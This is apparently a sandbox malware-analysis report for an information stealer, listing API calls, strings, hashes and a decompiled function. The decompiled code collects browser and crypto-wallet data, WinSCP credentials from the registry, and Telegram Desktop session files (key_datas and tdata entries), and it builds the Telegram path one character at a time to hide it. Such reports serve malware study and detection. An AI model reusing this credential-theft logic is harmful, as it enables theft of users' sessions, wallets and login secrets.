Part of subcall function 0041E9F0: lstrcat.KERNEL32(0040D01C,?), ref: 0041EB12
Part of subcall function 0041E9F0: RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,00000400), ref: 0041EB44
Part of subcall function 0041E9F0: lstrcat.KERNEL32(0040D01C,004458A4), ref: 0041EB54
Part of subcall function 0041E9F0: lstrcat.KERNEL32(0040D01C,?), ref: 0041EB62

lstrlen.KERNEL32(?,?), ref: 0040D023
_memset.LIBCMT ref: 0040D04B

Strings

Cores: , xrefs: 0040CE31
Threads: , xrefs: 0040CEA3
AV: , xrefs: 0040CB71
Install date: , xrefs: 0040CB3A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset$InformationLogicalProcessor_free$CharCloseCurrentEnumErrorIos_base_dtorLastNameProcessUser_malloc_strlenlstrlenstd::ios_base::_wsprintf
String ID: AV: $Cores: $Install date: $Threads:
API String ID: 448395061-1125741552
Opcode ID: b72cc287081491196678b53a9c1b4a67586bb24186a06ee55288e6196ff18f9f
Instruction ID: ee063db972fa570a8aa68773036a1f5a1464790e2269969da86aa56033022238
Opcode Fuzzy Hash: b72cc287081491196678b53a9c1b4a67586bb24186a06ee55288e6196ff18f9f
Instruction Fuzzy Hash: BA3243B6A0025CEBCB54EF51EC88DDA7778BB86705B0489AEF106A3150EF749344CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DCD0 Relevance: 123.2, APIs: 55, Strings: 15, Instructions: 724
stringCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041DCD0(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				char _v800;
				char _v100800;
				intOrPtr _v100808;
				char _v100812;
				char _v100828;
				intOrPtr _v100836;
				char _v100840;
				char _v100856;
				intOrPtr _v100864;
				char _v100868;
				char _v100884;
				intOrPtr _v100892;
				char _v100896;
				char _v100912;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t183;
				signed int _t184;
				intOrPtr _t194;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t216;
				intOrPtr _t218;
				intOrPtr _t220;
				intOrPtr _t222;
				intOrPtr _t224;
				intOrPtr _t226;
				intOrPtr _t228;
				intOrPtr _t230;
				intOrPtr _t232;
				intOrPtr _t234;
				intOrPtr _t236;
				void* _t237;
				void* _t241;
				intOrPtr* _t314;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t329;
				intOrPtr _t352;
				void* _t357;
				intOrPtr _t360;
				intOrPtr _t362;
				intOrPtr _t364;
				intOrPtr _t367;
				intOrPtr _t406;
				intOrPtr _t407;
				intOrPtr _t457;
				intOrPtr _t460;
				intOrPtr _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				intOrPtr _t465;
				intOrPtr _t466;
				intOrPtr _t467;
				intOrPtr _t468;
				intOrPtr _t469;
				intOrPtr _t470;
				intOrPtr _t471;
				intOrPtr _t472;
				intOrPtr _t473;
				intOrPtr _t474;
				intOrPtr _t475;
				intOrPtr _t476;
				intOrPtr _t477;
				intOrPtr _t478;
				intOrPtr _t479;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr _t482;
				void* _t513;
				void* _t514;
				intOrPtr* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				void* _t525;
				void* _t527;
				void* _t529;
				void* _t531;

				_t531 = __eflags;
				_push(0xffffffff);
				_push(E0043F3F8);
				_push( *[fs:0x0]);
				E0042BC40(0x18a20);
				_t183 =  *0x451f00; // 0xc21d6f0a
				_t184 = _t183 ^ _t519;
				_v20 = _t184;
				_push(_t513);
				_push(_t184);
				 *[fs:0x0] =  &_v16;
				_t517 = __ecx;
				E0042A2F0( &_v100800, 0, 0x186a0);
				 *((intOrPtr*)(_t517 + 0xc)) = 0;
				 *((intOrPtr*)(_t517 + 0x10)) = 0;
				 *((intOrPtr*)(_t517 + 8)) = 0;
				 *((intOrPtr*)(_t517 + 0x18)) = 0;
				 *((intOrPtr*)(_t517 + 0x14)) = 0;
				 *((intOrPtr*)(_t517 + 0x1c)) = 0;
				E00417D30(_a8, _t513, _t531, _a4, _a8);
				_t360 =  *0x453a54; // 0x25c6320
				_t460 =  *0x453864; // 0x25c67b0
				_t521 = _t520 + 0x14;
				E00417B80(_t517, _t531, _t460, _t360,  &_v100800);
				_t362 =  *0x453808; // 0x25c6218
				_t461 =  *0x4534cc; // 0x25c67d8
				E00417B80(_t517, _t531, _t461, _t362,  &_v100800);
				_t364 =  *0x453980; // 0x25c9228
				_t462 =  *0x4536ec; // 0x25c6600
				_t194 =  *0x453948; // 0x25c72c8
				E0041C3E0(_t517, _t531, _t194, _t462, _t364,  &_v100800, 0);
				_t463 =  *0x4533d8; // 0x25c7268
				_t196 =  *0x453714; // 0x25c6620
				_t367 =  *0x453948; // 0x25c72c8
				E0041C3E0(_t517, _t531, _t367, _t196, _t463,  &_v100800, 0);
				_t198 =  *0x453948; // 0x25c72c8
				E0041C3E0(_t517, _t531, _t198, "Opera Crypto", "Opera Crypto Stable",  &_v100800, 1);
				_t465 =  *0x453794; // 0x25c61b8
				_t200 =  *0x453728; // 0x25c6810
				E0041C160(_t517, _t531, _t200, _t465,  &_v100800);
				_t466 =  *0x453528; // 0x25c62a8
				_t202 =  *0x453a20; // 0x25c5f80
				E0041C160(_t517, _t531, _t202, _t466,  &_v100800);
				_t467 =  *0x4538b0; // 0x25c64d0
				_t204 =  *0x453508; // 0x25c5fe0
				E0041C160(_t517, _t531, _t204, _t467,  &_v100800);
				_t468 =  *0x453798; // 0x25c64f0
				_t206 =  *0x4537e8; // 0x25c6000
				E0041C160(_t517, _t531, _t206, _t468,  &_v100800);
				_t469 =  *0x4537c0; // 0x25c65c0
				_t208 =  *0x453b94; // 0x25c5d60
				E0041C160(_t517, _t531, _t208, _t469,  &_v100800);
				_t470 =  *0x453a9c; // 0x25c62c0
				_t210 =  *0x453384; // 0x25c6838
				E0041C160(_t517, _t531, _t210, _t470,  &_v100800);
				_t471 =  *0x4539c4; // 0x25c5c60
				_t212 =  *0x453760; // 0x25c6860
				E0041C160(_t517, _t531, _t212, _t471,  &_v100800);
				_t472 =  *0x453390; // 0x25c65e0
				_t214 =  *0x45398c; // 0x25c6890
				E0041C160(_t517, _t531, _t214, _t472,  &_v100800);
				_t473 =  *0x45375c; // 0x25c6068
				_t216 =  *0x453548; // 0x25c65f0
				E0041C160(_t517, _t531, _t216, _t473,  &_v100800);
				_t474 =  *0x4534c4; // 0x25c6170
				_t218 =  *0x453568; // 0x25c5ec0
				E0041C160(_t517, _t531, _t218, _t474,  &_v100800);
				_t475 =  *0x453750; // 0x25c6490
				_t220 =  *0x453814; // 0x25c5e20
				E0041C160(_t517, _t531, _t220, _t475,  &_v100800);
				_t476 =  *0x453ad0; // 0x25c6188
				_t222 =  *0x4533b0; // 0x25c5d20
				E0041C160(_t517, _t531, _t222, _t476,  &_v100800);
				_t477 =  *0x4533ec; // 0x25c62f0
				_t224 =  *0x4534a0; // 0x25c5f40
				E0041C160(_t517, _t531, _t224, _t477,  &_v100800);
				_t478 =  *0x453b9c; // 0x25c61d0
				_t226 =  *0x45391c; // 0x25c6a48
				E0041C160(_t517, _t531, _t226, _t478,  &_v100800);
				_t479 =  *0x453480; // 0x25c6338
				_t228 =  *0x45393c; // 0x25c6bb0
				E0041C160(_t517, _t531, _t228, _t479,  &_v100800);
				_t480 =  *0x453a6c; // 0x25c6128
				_t230 =  *0x45335c; // 0x25c6c28
				E0041C160(_t517, _t531, _t230, _t480,  &_v100800);
				_t481 =  *0x453408; // 0x25c7308
				_t232 =  *0x4539e8; // 0x25c6b10
				E0041C160(_t517, _t531, _t232, _t481,  &_v100800);
				_t482 =  *0x4535f0; // 0x25c8870
				_t234 =  *0x4533cc; // 0x25c8188
				E0041C160(_t517, _t531, _t234, _t482,  &_v100800); // executed
				_t532 =  *_t517;
				if( *_t517 != 0) {
					E0041D5F0(_t517, _t532); // executed
					_t533 =  *_t517;
					if( *_t517 != 0) {
						E0041BAF0(_t517,  &_v100800);
						_t352 =  *0x453564; // 0x25c91f8
						_t457 =  *0x4537f8; // 0x25c7328
						E00417B80(_t517, _t533, _t457, _t352,  &_v100800); // executed
						E0041CA40(_t533,  &_v100800); // executed
						_t521 = _t521 + 4;
					}
				}
				if( *((intOrPtr*)(_t517 + 5)) != 0) {
					E0042A2F0( &_v280, 0, 0x104);
					E0042A2F0( &_v800, 0, 0x104);
					E0042A2F0( &_v540, 0, 0x104);
					 *0x464860( &_v280, E00420650(0, _t513, _t517, 0x1a));
					 *0x464860( &_v280, "\\");
					 *0x464860( &_v280, "T");
					 *0x464860( &_v280, "e");
					 *0x464860( &_v280, "l");
					 *0x464860( &_v280, "e");
					 *0x464860( &_v280, "g");
					 *0x464860( &_v280, "r");
					 *0x464860( &_v280, "a");
					 *0x464860( &_v280, "m");
					 *0x464860( &_v280, " ");
					 *0x464860( &_v280, "D");
					 *0x464860( &_v280, "e");
					 *0x464860( &_v280, "s");
					 *0x464860( &_v280, "k");
					 *0x464860( &_v280, "t");
					 *0x464860( &_v280, "o");
					 *0x464860( &_v280, "p");
					 *0x464860( &_v280, "\\");
					 *0x464860( &_v800, "k");
					 *0x464860( &_v800, "e");
					 *0x464860( &_v800, "y");
					 *0x464860( &_v800, "_");
					 *0x464860( &_v800, "d");
					 *0x464860( &_v800, "a");
					 *0x464860( &_v800, "t");
					 *0x464860( &_v800, "a");
					 *0x464860( &_v800, "s");
					 *0x464860( &_v540, "D");
					 *0x464860( &_v540, "8");
					 *0x464860( &_v540, "7");
					 *0x464860( &_v540, "7");
					 *0x464860( &_v540, "F");
					 *0x464860( &_v540, "7");
					 *0x464860( &_v540, "8");
					 *0x464860( &_v540, "3");
					 *0x464860( &_v540, "D");
					 *0x464860( &_v540, "5");
					 *0x464860( &_v540, "D");
					 *0x464860( &_v540, "3");
					 *0x464860( &_v540, "E");
					 *0x464860( &_v540, "F");
					 *0x464860( &_v540, "8");
					 *0x464860( &_v540, "C");
					 *0x464860( &_v540, 0x4465b0);
					E00416500(_t517, 0x443c1c,  &_v280,  &_v800, "Telegram"); // executed
					E00416500(_t517, 0x443c1c,  &_v280,  &_v540, "Telegram"); // executed
					_v100808 = 0xf;
					_v100812 = 0;
					_v100828 = 0;
					E00404BC0( &_v100828, "p*", E0042BC70("p*"));
					_v8 = 0;
					_t314 = E00404DB0( &_v100828,  &_v100856, "ma",  &_v100828);
					_t525 = _t521 + 0x38;
					_v8 = 1;
					if( *((intOrPtr*)(_t314 + 0x14)) >= 0x10) {
						_t314 =  *_t314;
					}
					E00416500(_t517, 0x443c1c,  &_v280, _t314, "Telegram");
					if(_v100836 >= 0x10) {
						_push(_v100856);
						E0042A289();
						_t525 = _t525 + 4;
					}
					_v100836 = 0xf;
					_v100840 = 0;
					_v100856 = 0;
					_v8 = 0xffffffff;
					if(_v100808 >= 0x10) {
						_push(_v100828);
						E0042A289();
						_t525 = _t525 + 4;
					}
					_v100808 = 0xf;
					_v100812 = 0;
					_v100828 = 0;
					E00404BC0( &_v100828, "BC10B77*", E0042BC70("BC10B77*"));
					_v8 = 2;
					_t320 = E00404DB0( &_v100856,  &_v100856, "A7FDF864F",  &_v100828);
					_t527 = _t525 + 0x10;
					_v8 = 3;
					if( *((intOrPtr*)(_t320 + 0x14)) >= 0x10) {
						_t320 =  *_t320;
					}
					E00416500(_t517, 0x443c1c,  &_v280, _t320, "Telegram");
					if(_v100836 >= 0x10) {
						_push(_v100856);
						E0042A289();
						_t527 = _t527 + 4;
					}
					_v100836 = 0xf;
					_v100840 = 0;
					_v100856 = 0;
					_v8 = 0xffffffff;
					if(_v100808 >= 0x10) {
						_push(_v100828);
						E0042A289();
						_t527 = _t527 + 4;
					}
					_v100808 = 0xf;
					_v100812 = 0;
					_v100828 = 0;
					E00404BC0( &_v100828, "A6F891F2*", E0042BC70("A6F891F2*"));
					_v8 = 4;
					_t325 = E00404DB0( &_v100828,  &_v100856, "A92DAA6E",  &_v100828);
					_t529 = _t527 + 0x10;
					_v8 = 5;
					if( *((intOrPtr*)(_t325 + 0x14)) >= 0x10) {
						_t325 =  *_t325;
					}
					E00416500(_t517, 0x443c1c,  &_v280, _t325, "Telegram");
					if(_v100836 >= 0x10) {
						_push(_v100856);
						E0042A289();
						_t529 = _t529 + 4;
					}
					_v100836 = 0xf;
					_v100840 = 0;
					_v100856 = 0;
					_v8 = 0xffffffff;
					if(_v100808 >= 0x10) {
						_push(_v100828);
						E0042A289();
						_t529 = _t529 + 4;
					}
					_v100864 = 0xf;
					_v100868 = 0;
					_v100884 = 0;
					E00404BC0( &_v100884, "C461824F*", E0042BC70("C461824F*"));
					_v8 = 6;
					_t329 = E00404DB0( &_v100884,  &_v100912, "F8806DD0",  &_v100884);
					_t521 = _t529 + 0x10;
					_v8 = 7;
					if( *((intOrPtr*)(_t329 + 0x14)) >= 0x10) {
						_t329 =  *_t329;
					}
					E00416500(_t517, 0x443c1c,  &_v280, _t329, "Telegram");
					if(_v100892 >= 0x10) {
						_push(_v100912);
						E0042A289();
						_t521 = _t521 + 4;
					}
					_v100892 = 0xf;
					_v100896 = 0;
					_v100912 = 0;
					_v8 = 0xffffffff;
					if(_v100864 >= 0x10) {
						_push(_v100884);
						E0042A289();
						_t521 = _t521 + 4;
					}
					_v100864 = 0xf;
					_v100868 = 0;
					_v100884 = 0;
					E00416500(_t517, 0x443c1c,  &_v280, "countries", "Telegram");
					E00416500(_t517, 0x443c1c,  &_v280, "prefix", "Telegram");
					E00416500(_t517, 0x443c1c,  &_v280, "settingss", "Telegram");
					E00416500(_t517, 0x443c1c,  &_v280, "shortcuts-custom.json", "Telegram");
					E00416500(_t517, 0x443c1c,  &_v280, "shortcuts-default.json", "Telegram");
					E00416500(_t517, 0x443c1c,  &_v280, "usertag", "Telegram");
				}
				_t236 =  *0x453da0; // 0x0
				 *((intOrPtr*)(_t517 + 0xc)) = _t236;
				_t406 =  *0x453dac; // 0x0
				 *((intOrPtr*)(_t517 + 0x10)) = _t406;
				_t237 =  *0x464758( &_v100800);
				_t407 =  *0x453a04; // 0x25c9210
				E00429620( *((intOrPtr*)(_t517 + 0x20)), _t407,  &_v100800, _t237);
				_t241 = E0042A2F0( &_v100800, 0, 0x186a0);
				 *[fs:0x0] = _v16;
				_pop(_t514);
				_pop(_t518);
				_pop(_t357);
				return E0042A36A(_t241, _t357, _v20 ^ _t519,  *((intOrPtr*)(_t517 + 0x20)), _t514, _t518);
			}

0x0041dcd0
0x0041dcd3
0x0041dcd5
0x0041dce0
0x0041dce6
0x0041dceb
0x0041dcf0
0x0041dcf2
0x0041dcf7
0x0041dcf8
0x0041dcfc
0x0041dd11
0x0041dd13
0x0041dd20
0x0041dd23
0x0041dd26
0x0041dd29
0x0041dd2c
0x0041dd2f
0x0041dd32
0x0041dd37
0x0041dd3d
0x0041dd43
0x0041dd51
0x0041dd56
0x0041dd5c
0x0041dd6d
0x0041dd72
0x0041dd78
0x0041dd86
0x0041dd90
0x0041dd95
0x0041dd9b
0x0041dda8
0x0041ddb3
0x0041ddb8
0x0041ddd3
0x0041ddd8
0x0041ddde
0x0041ddee
0x0041ddf3
0x0041ddf9
0x0041de09
0x0041de0e
0x0041de14
0x0041de24
0x0041de29
0x0041de2f
0x0041de3f
0x0041de44
0x0041de4a
0x0041de5a
0x0041de5f
0x0041de65
0x0041de75
0x0041de7a
0x0041de80
0x0041de90
0x0041de95
0x0041de9b
0x0041deab
0x0041deb0
0x0041deb6
0x0041dec6
0x0041decb
0x0041ded1
0x0041dee1
0x0041dee6
0x0041deec
0x0041defc
0x0041df01
0x0041df07
0x0041df17
0x0041df1c
0x0041df22
0x0041df32
0x0041df37
0x0041df3d
0x0041df4d
0x0041df52
0x0041df58
0x0041df68
0x0041df6d
0x0041df73
0x0041df83
0x0041df88
0x0041df8e
0x0041df9e
0x0041dfa3
0x0041dfa9
0x0041dfb9
0x0041dfbe
0x0041dfc0
0x0041dfc4
0x0041dfc9
0x0041dfcb
0x0041dfd6
0x0041dfdb
0x0041dfe0
0x0041dff1
0x0041dffd
0x0041e002
0x0041e002
0x0041dfcb
0x0041e008
0x0041e01b
0x0041e02d
0x0041e03f
0x0041e056
0x0041e068
0x0041e07a
0x0041e08c
0x0041e09e
0x0041e0b0
0x0041e0c2
0x0041e0d4
0x0041e0e6
0x0041e0f8
0x0041e10a
0x0041e11c
0x0041e12e
0x0041e140
0x0041e152
0x0041e164
0x0041e176
0x0041e188
0x0041e19a
0x0041e1ac
0x0041e1be
0x0041e1d0
0x0041e1e2
0x0041e1f4
0x0041e206
0x0041e218
0x0041e22a
0x0041e23c
0x0041e24e
0x0041e260
0x0041e272
0x0041e284
0x0041e296
0x0041e2a8
0x0041e2ba
0x0041e2cc
0x0041e2de
0x0041e2f0
0x0041e302
0x0041e314
0x0041e326
0x0041e338
0x0041e34a
0x0041e35c
0x0041e36e
0x0041e38e
0x0041e3ad
0x0041e3b7
0x0041e3c1
0x0041e3c7
0x0041e3e1
0x0041e3f9
0x0041e3fc
0x0041e401
0x0041e409
0x0041e410
0x0041e412
0x0041e412
0x0041e428
0x0041e433
0x0041e43b
0x0041e43c
0x0041e441
0x0041e441
0x0041e444
0x0041e44e
0x0041e454
0x0041e45a
0x0041e467
0x0041e46f
0x0041e470
0x0041e475
0x0041e475
0x0041e47d
0x0041e487
0x0041e48d
0x0041e4a7
0x0041e4bf
0x0041e4c6
0x0041e4cb
0x0041e4ce
0x0041e4d5
0x0041e4d7
0x0041e4d7
0x0041e4ed
0x0041e4f8
0x0041e500
0x0041e501
0x0041e506
0x0041e506
0x0041e509
0x0041e513
0x0041e519
0x0041e51f
0x0041e52c
0x0041e534
0x0041e535
0x0041e53a
0x0041e53a
0x0041e542
0x0041e54c
0x0041e552
0x0041e56c
0x0041e584
0x0041e58b
0x0041e590
0x0041e593
0x0041e59a
0x0041e59c
0x0041e59c
0x0041e5b2
0x0041e5bd
0x0041e5c5
0x0041e5c6
0x0041e5cb
0x0041e5cb
0x0041e5ce
0x0041e5d8
0x0041e5de
0x0041e5e4
0x0041e5f1
0x0041e5f9
0x0041e5fa
0x0041e5ff
0x0041e5ff
0x0041e607
0x0041e611
0x0041e617
0x0041e631
0x0041e649
0x0041e650
0x0041e655
0x0041e658
0x0041e65f
0x0041e661
0x0041e661
0x0041e677
0x0041e682
0x0041e68a
0x0041e68b
0x0041e690
0x0041e690
0x0041e693
0x0041e69d
0x0041e6a3
0x0041e6a9
0x0041e6b6
0x0041e6be
0x0041e6bf
0x0041e6c4
0x0041e6c4
0x0041e6df
0x0041e6e9
0x0041e6ef
0x0041e6f5
0x0041e712
0x0041e72f
0x0041e74c
0x0041e769
0x0041e786
0x0041e786
0x0041e78b
0x0041e790
0x0041e793
0x0041e7a0
0x0041e7a3
0x0041e7a9
0x0041e7bc
0x0041e7ce
0x0041e7d9
0x0041e7e1
0x0041e7e2
0x0041e7e3
0x0041e7f1

APIs

_memset.LIBCMT ref: 0041DD13

Part of subcall function 00417D30: _memset.LIBCMT ref: 00417D5E

Part of subcall function 00417B80: _memset.LIBCMT ref: 00417BB5
Part of subcall function 00417B80: _memset.LIBCMT ref: 00417BC8
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00000000), ref: 00417BDF
Part of subcall function 00417B80: lstrcat.KERNEL32(?,025C6320), ref: 00417BED
Part of subcall function 00417B80: lstrcat.KERNEL32(?,?), ref: 00417C01
Part of subcall function 00417B80: lstrcat.KERNEL32(?,..\), ref: 00417C13
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00446324), ref: 00417C25
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A7C), ref: 00417C37
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A40), ref: 00417C49
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00446320), ref: 00417C5B
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A4C), ref: 00417C6D
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A6C), ref: 00417C7F
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A78), ref: 00417C91
Part of subcall function 00417B80: lstrcat.KERNEL32(?,00445A44), ref: 00417CA3
Part of subcall function 00417B80: lstrcat.KERNEL32(?,.ini), ref: 00417CB5

Part of subcall function 00417B80: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000000), ref: 00417D0E

Part of subcall function 0041C3E0: _memset.LIBCMT ref: 0041C447
Part of subcall function 0041C3E0: _memset.LIBCMT ref: 0041C459
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,00000000), ref: 0041C470
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,025C6320), ref: 0041C47E
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,?), ref: 0041C48C
Part of subcall function 0041C3E0: StrCmpCA.SHLWAPI(?,025C9228,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4A0
Part of subcall function 0041C3E0: StrCmpCA.SHLWAPI(?,025C7268,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4BC
Part of subcall function 0041C3E0: StrCmpCA.SHLWAPI(?,Opera Crypto Stable,?,?,?,C21D6F0A,00000000,?,00000000), ref: 0041C4D6
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,00000000), ref: 0041C4FC
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,025C6320), ref: 0041C50A
Part of subcall function 0041C3E0: _memset.LIBCMT ref: 0041C51D
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,?), ref: 0041C533
Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,00443C68), ref: 0041C545

Part of subcall function 0041C3E0: lstrcat.KERNEL32(?,025C61E8), ref: 0041C558
Part of subcall function 0041C3E0: _strlen.LIBCMT ref: 0041C57B

Part of subcall function 0041C160: _memset.LIBCMT ref: 0041C1C0
Part of subcall function 0041C160: lstrcat.KERNEL32(?,00000000), ref: 0041C1D7
Part of subcall function 0041C160: lstrcat.KERNEL32(?,025C6320), ref: 0041C1E5
Part of subcall function 0041C160: _memset.LIBCMT ref: 0041C1F8
Part of subcall function 0041C160: lstrcat.KERNEL32(?,?), ref: 0041C20E
Part of subcall function 0041C160: lstrcat.KERNEL32(?,00443C68), ref: 0041C220
Part of subcall function 0041C160: lstrcat.KERNEL32(?,025C61E8), ref: 0041C233
Part of subcall function 0041C160: _strlen.LIBCMT ref: 0041C256

_memset.LIBCMT ref: 0041E01B
_memset.LIBCMT ref: 0041E02D
_memset.LIBCMT ref: 0041E03F
lstrcat.KERNEL32(?,00000000), ref: 0041E056
lstrcat.KERNEL32(?,00443C68), ref: 0041E068
lstrcat.KERNEL32(?,00445A58), ref: 0041E07A
lstrcat.KERNEL32(?,00445A78), ref: 0041E08C
lstrcat.KERNEL32(?,00445A6C), ref: 0041E09E
lstrcat.KERNEL32(?,00445A78), ref: 0041E0B0
lstrcat.KERNEL32(?,00445A48), ref: 0041E0C2
lstrcat.KERNEL32(?,00445A7C), ref: 0041E0D4
lstrcat.KERNEL32(?,00445A68), ref: 0041E0E6
lstrcat.KERNEL32(?,00445A34), ref: 0041E0F8
lstrcat.KERNEL32(?,00445E2C), ref: 0041E10A
lstrcat.KERNEL32(?,00446684), ref: 0041E11C
lstrcat.KERNEL32(?,00445A78), ref: 0041E12E
lstrcat.KERNEL32(?,00445A44), ref: 0041E140
lstrcat.KERNEL32(?,00446680), ref: 0041E152
lstrcat.KERNEL32(?,00445A84), ref: 0041E164
lstrcat.KERNEL32(?,00445A40), ref: 0041E176
lstrcat.KERNEL32(?,00446324), ref: 0041E188
lstrcat.KERNEL32(?,00443C68), ref: 0041E19A
lstrcat.KERNEL32(?,00446680), ref: 0041E1AC

Part of subcall function 0041D5F0: _strlen.LIBCMT ref: 0041D647
Part of subcall function 0041D5F0: _memset.LIBCMT ref: 0041D66C
Part of subcall function 0041D5F0: _memset.LIBCMT ref: 0041D67E
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,00000000), ref: 0041D695
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,025C6B88), ref: 0041D6A8
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,025C9CE8), ref: 0041D6BC
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,00000000), ref: 0041D6D4
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,025C8458), ref: 0041D6E8
Part of subcall function 0041D5F0: lstrcat.KERNEL32(?,004465B0), ref: 0041D6FA
Part of subcall function 0041D5F0: _strlen.LIBCMT ref: 0041D71A

lstrcat.KERNEL32(?,00445A78), ref: 0041E1BE
lstrcat.KERNEL32(?,00445A70), ref: 0041E1D0
lstrcat.KERNEL32(?,00445E84), ref: 0041E1E2
lstrcat.KERNEL32(?,00445A88), ref: 0041E1F4
lstrcat.KERNEL32(?,00445A68), ref: 0041E206
lstrcat.KERNEL32(?,00445A84), ref: 0041E218
lstrcat.KERNEL32(?,00445A68), ref: 0041E22A
lstrcat.KERNEL32(?,00445A44), ref: 0041E23C
lstrcat.KERNEL32(?,00446684), ref: 0041E24E
lstrcat.KERNEL32(?,0044667C), ref: 0041E260
lstrcat.KERNEL32(?,00445A90), ref: 0041E272
lstrcat.KERNEL32(?,00445A90), ref: 0041E284
lstrcat.KERNEL32(?,00446678), ref: 0041E296
lstrcat.KERNEL32(?,00445A90), ref: 0041E2A8
lstrcat.KERNEL32(?,0044667C), ref: 0041E2BA
lstrcat.KERNEL32(?,00446674), ref: 0041E2CC
lstrcat.KERNEL32(?,00446684), ref: 0041E2DE
lstrcat.KERNEL32(?,00446670), ref: 0041E2F0
lstrcat.KERNEL32(?,00446684), ref: 0041E302
lstrcat.KERNEL32(?,00446674), ref: 0041E314
lstrcat.KERNEL32(?,0044666C), ref: 0041E326
lstrcat.KERNEL32(?,00446678), ref: 0041E338
lstrcat.KERNEL32(?,0044667C), ref: 0041E34A
lstrcat.KERNEL32(?,00446668), ref: 0041E35C
lstrcat.KERNEL32(?,004465B0), ref: 0041E36E

Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BB42
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BB64
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BB7C
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BB94
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BBA7
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BBB5
Part of subcall function 0041BAF0: _memset.LIBCMT ref: 0041BBC6
Part of subcall function 0041BAF0: RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041BBF4
Part of subcall function 0041BAF0: _strlen.LIBCMT ref: 0041BC20
Part of subcall function 0041BAF0: _strlen.LIBCMT ref: 0041BC56

Part of subcall function 0041CA40: _memset.LIBCMT ref: 0041CA86
Part of subcall function 0041CA40: lstrcat.KERNEL32(?,00000000), ref: 0041CA9D
Part of subcall function 0041CA40: lstrcat.KERNEL32(?,025C6750), ref: 0041CAB0
Part of subcall function 0041CA40: std::_Lockit::_Lockit.LIBCPMT ref: 0041CBA1

Part of subcall function 00416500: wsprintfA.USER32 ref: 0041653D
Part of subcall function 00416500: FindFirstFileA.KERNEL32(?,?), ref: 00416554
Part of subcall function 00416500: StrCmpCA.SHLWAPI(?,004456B0), ref: 0041657C
Part of subcall function 00416500: StrCmpCA.SHLWAPI(?,004456AC), ref: 00416596
Part of subcall function 00416500: wsprintfA.USER32 ref: 004165B8
Part of subcall function 00416500: StrCmpCA.SHLWAPI(?,00443C1C), ref: 004165CD
Part of subcall function 00416500: wsprintfA.USER32 ref: 004165EA
Part of subcall function 00416500: PathMatchSpecA.SHLWAPI(?,?), ref: 00416620
Part of subcall function 00416500: _memset.LIBCMT ref: 0041663C
Part of subcall function 00416500: lstrcat.KERNEL32(?,\Soft\), ref: 00416650
Part of subcall function 00416500: lstrcat.KERNEL32(?,?), ref: 0041665E
Part of subcall function 00416500: lstrcat.KERNEL32(?,00443C68), ref: 00416670
Part of subcall function 00416500: lstrcat.KERNEL32(?,?), ref: 00416684
Part of subcall function 00416500: _memset.LIBCMT ref: 00416698

Part of subcall function 00416500: wsprintfA.USER32 ref: 00416609
Part of subcall function 00416500: lstrcat.KERNEL32(?,025C13D0), ref: 004166AD
Part of subcall function 00416500: lstrcat.KERNEL32(?,00000000), ref: 004166C8
Part of subcall function 00416500: CopyFileA.KERNEL32(?,?,00000001), ref: 004166DE
Part of subcall function 00416500: DeleteFileA.KERNEL32(?), ref: 00416705
Part of subcall function 00416500: FindNextFileA.KERNEL32(?,?), ref: 00416736
Part of subcall function 00416500: FindClose.KERNEL32(?), ref: 0041674B

_strlen.LIBCMT ref: 0041E3CD

Part of subcall function 00404DB0: _strlen.LIBCMT ref: 00404DC0

_strlen.LIBCMT ref: 0041E493
_strlen.LIBCMT ref: 0041E558
_strlen.LIBCMT ref: 0041E61D
